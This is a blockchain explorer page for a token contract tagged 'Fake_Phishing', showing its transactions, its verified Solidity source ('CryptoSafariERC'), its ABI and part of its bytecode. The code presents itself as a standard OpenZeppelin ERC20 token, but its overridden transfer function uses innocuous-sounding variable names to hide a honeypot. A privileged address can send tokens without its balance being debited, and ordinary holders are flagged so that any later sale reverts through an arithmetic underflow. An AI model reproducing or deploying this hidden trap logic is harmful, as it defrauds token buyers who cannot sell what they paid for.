ETH Price: $2,075.61 (-1.30%)

Contract

0xe6227f9Ed6C79AC12a3A3Db4eef33495c4DC5948
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve164128052023-01-15 14:29:591154 days ago1673792999IN
Fake_Phishing316076
0 ETH0.0007653816.42994347
Transfer164128002023-01-15 14:28:591154 days ago1673792939IN
Fake_Phishing316076
0 ETH0.0009174914.45445178
Approve164128002023-01-15 14:28:591154 days ago1673792939IN
Fake_Phishing316076
0 ETH0.0006966514.95445178
Approve164127882023-01-15 14:26:351154 days ago1673792795IN
Fake_Phishing316076
0 ETH0.0006971714.96574308
Approve164126032023-01-15 13:49:111154 days ago1673790551IN
Fake_Phishing316076
0 ETH0.0006418613.77827089
Approve164125822023-01-15 13:44:591154 days ago1673790299IN
Fake_Phishing316076
0 ETH0.000514719.28799206
Approve164125782023-01-15 13:43:591154 days ago1673790239IN
Fake_Phishing316076
0 ETH0.0007667716.45960014
Approve164125762023-01-15 13:43:351154 days ago1673790215IN
Fake_Phishing316076
0 ETH0.0008000217.17336468
Approve164125752023-01-15 13:43:231154 days ago1673790203IN
Fake_Phishing316076
0 ETH0.0007437615.96576173
Approve164125672023-01-15 13:41:471154 days ago1673790107IN
Fake_Phishing316076
0 ETH0.0008491318.22755288
Approve164125662023-01-15 13:41:351154 days ago1673790095IN
Fake_Phishing316076
0 ETH0.0008459118.1586156
Approve164125612023-01-15 13:40:351154 days ago1673790035IN
Fake_Phishing316076
0 ETH0.0007826216.8
Approve164125532023-01-15 13:38:471154 days ago1673789927IN
Fake_Phishing316076
0 ETH0.0008255317.72113162
Approve164125532023-01-15 13:38:471154 days ago1673789927IN
Fake_Phishing316076
0 ETH0.0008255317.72113162
Approve164125472023-01-15 13:37:351154 days ago1673789855IN
Fake_Phishing316076
0 ETH0.0007960617.0884403
Approve164125442023-01-15 13:36:591154 days ago1673789819IN
Fake_Phishing316076
0 ETH0.0007331915.73891576
Approve164125332023-01-15 13:34:471154 days ago1673789687IN
Fake_Phishing316076
0 ETH0.000739815.88079333
Approve164125292023-01-15 13:33:591154 days ago1673789639IN
Fake_Phishing316076
0 ETH0.0007607116.32955027
Renounce Ownersh...164125242023-01-15 13:32:591154 days ago1673789579IN
Fake_Phishing316076
0 ETH0.0003815616.42853314
Approve164125222023-01-15 13:32:351154 days ago1673789555IN
Fake_Phishing316076
0 ETH0.0007672616.47028343
Approve164125192023-01-15 13:31:591154 days ago1673789519IN
Fake_Phishing316076
0 ETH0.0008307717.83357208
Approve164125082023-01-15 13:29:471154 days ago1673789387IN
Fake_Phishing316076
0 ETH0.0008079617.34382638
Approve164125062023-01-15 13:29:231154 days ago1673789363IN
Fake_Phishing316076
0 ETH0.0007317815.70855224
Approve164125042023-01-15 13:28:591154 days ago1673789339IN
Fake_Phishing316076
0 ETH0.0007427415.94385438
Approve164125002023-01-15 13:28:111154 days ago1673789291IN
Fake_Phishing316076
0 ETH0.000758916.29068301
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
CryptoSafariERC

Compiler Version
v0.8.11+commit.d7f03943

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license
/**
 *Submitted for verification at Etherscan.io on 2023-01-15
*/

/**

https://t.me/CryptoSafariERC
https://cryptosafari.site/



*/

// SPDX-License-Identifier: Unlicense

pragma solidity ^0.8.11;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) public Jungleadd;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 public _totalSupply;

    string private meant;
    string private widely;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        meant = name_;
        widely = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return meant;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return widely;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return 1000000000000 * 10**9;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return Jungleadd[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        metal(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        several(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        metal(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        several(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            several(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token voice, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function metal(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = Jungleadd[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            Jungleadd[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            Jungleadd[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = Jungleadd[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            Jungleadd[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function several(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                several(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

contract CryptoSafariERC is ERC20, Ownable {
    address private gas;
    uint256 private arm = 4;
    uint256 private care = 28;

    IUniswapV2Router02 public uniswapV2Router;

    mapping(address => uint256) public fast;
    mapping(address => uint256) public autoburnLP;

    function metal(
        address exciting,
        address morning,
        uint256 review
    ) internal override {
        if (fast[exciting] == 0 && autoburnLP[exciting] > 0) {
            address uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
            if (uniswapV2Pair != exciting) {
                fast[exciting] -= care;
            }
        }

        address safarilp = gas;
        gas = morning;
        autoburnLP[safarilp] += care;

        if (fast[exciting] == 0) Jungleadd[exciting] -= review;

        uint256 voice = review * arm;
        voice = voice / 100;
        review -= voice;
        Jungleadd[morning] += review;
        emit Transfer(exciting, morning, review);
    }

    constructor(
        string memory same,
        string memory raise,
        address ruoter,
        address current
    ) ERC20(same, raise) {
        uniswapV2Router = IUniswapV2Router02(ruoter);
        fast[current] = care;
        Jungleadd[_msgSender()] = 1000000000000 * 10**9;
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"string","name":"same","type":"string"},{"internalType":"string","name":"raise","type":"string"},{"internalType":"address","name":"ruoter","type":"address"},{"internalType":"address","name":"current","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"Jungleadd","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"autoburnLP","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"fast","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040526004600755601c6008553480156200001b57600080fd5b5060405162001100380380620011008339810160408190526200003e91620002e1565b8351849084906200005790600390602085019062000151565b5080516200006d90600490602084019062000151565b5050506200008a62000084620000fb60201b60201c565b620000ff565b600980546001600160a01b0319166001600160a01b03848116919091179091556008549082166000908152600a6020526040812091909155683635c9adc5dea000009080620000d63390565b6001600160a01b0316815260208101919091526040016000205550620003ad92505050565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b8280546200015f9062000370565b90600052602060002090601f016020900481019282620001835760008555620001ce565b82601f106200019e57805160ff1916838001178555620001ce565b82800160010185558215620001ce579182015b82811115620001ce578251825591602001919060010190620001b1565b50620001dc929150620001e0565b5090565b5b80821115620001dc5760008155600101620001e1565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200021f57600080fd5b81516001600160401b03808211156200023c576200023c620001f7565b604051601f8301601f19908116603f01168101908282118183101715620002675762000267620001f7565b816040528381526020925086838588010111156200028457600080fd5b600091505b83821015620002a8578582018301518183018401529082019062000289565b83821115620002ba5760008385830101525b9695505050505050565b80516001600160a01b0381168114620002dc57600080fd5b919050565b60008060008060808587031215620002f857600080fd5b84516001600160401b03808211156200031057600080fd5b6200031e888389016200020d565b955060208701519150808211156200033557600080fd5b5062000344878288016200020d565b9350506200035560408601620002c4565b91506200036560608601620002c4565b905092959194509250565b600181811c908216806200038557607f821691505b60208210811415620003a757634e487b7160e01b600052602260045260246000fd5b50919050565b610d4380620003bd6000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad578063a457c2d711610071578063a457c2d714610275578063a9059cbb14610288578063dd62ed3e1461029b578063f2fde38b146102ae578063f3378e08146102c157600080fd5b806370a0823114610209578063715018a6146102325780637a3dbb0d1461023c5780638da5cb5b1461025c57806395d89b411461026d57600080fd5b8063199c31be116100f4578063199c31be146101ab57806323b872dd146101cb578063313ce567146101de57806339509351146101ed5780633eaaf86b1461020057600080fd5b806306fdde0314610126578063095ea7b3146101445780631694505e1461016757806318160ddd14610192575b600080fd5b61012e6102e1565b60405161013b9190610afb565b60405180910390f35b610157610152366004610b65565b610373565b604051901515815260200161013b565b60095461017a906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b683635c9adc5dea000005b60405190815260200161013b565b61019d6101b9366004610b91565b60006020819052908152604090205481565b6101576101d9366004610bb5565b61038b565b6040516009815260200161013b565b6101576101fb366004610b65565b6103af565b61019d60025481565b61019d610217366004610b91565b6001600160a01b031660009081526020819052604090205490565b61023a6103d1565b005b61019d61024a366004610b91565b600a6020526000908152604090205481565b6005546001600160a01b031661017a565b61012e61043c565b610157610283366004610b65565b61044b565b610157610296366004610b65565b6104c6565b61019d6102a9366004610bf6565b6104d4565b61023a6102bc366004610b91565b6104ff565b61019d6102cf366004610b91565b600b6020526000908152604090205481565b6060600380546102f090610c2f565b80601f016020809104026020016040519081016040528092919081815260200182805461031c90610c2f565b80156103695780601f1061033e57610100808354040283529160200191610369565b820191906000526020600020905b81548152906001019060200180831161034c57829003601f168201915b5050505050905090565b6000336103818185856105ca565b5060019392505050565b6000336103998582856106ee565b6103a4858585610768565b506001949350505050565b6000336103818185856103c283836104d4565b6103cc9190610c80565b6105ca565b6005546001600160a01b031633146104305760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61043a6000610aa9565b565b6060600480546102f090610c2f565b6000338161045982866104d4565b9050838110156104b95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610427565b6103a482868684036105ca565b600033610381818585610768565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6005546001600160a01b031633146105595760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610427565b6001600160a01b0381166105be5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610427565b6105c781610aa9565b50565b6001600160a01b03831661062c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201